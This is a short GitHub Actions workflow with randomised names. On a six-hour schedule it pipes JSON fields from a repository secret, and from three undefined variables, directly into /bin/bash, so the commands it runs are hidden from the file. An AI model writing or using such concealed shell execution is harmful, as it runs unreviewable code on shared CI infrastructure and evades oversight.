name: taoshiwang1234

on:
  workflow_dispatch:
  schedule:
    - cron: '34 3/6 * * *'
jobs:  # 29621
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: taoshiwang1234
        env:
          r4828: ${{ secrets.r4828 }}
        run: |
          echo $r4828 | jq -r .udx75486 | /bin/bash
          echo $jydv8 | jq -r .rxkw86625 | /bin/bash
          echo $pbxx20895 | jq -r .clup315 | /bin/bash
          echo $je8498 | jq -r .u5 | /bin/bash

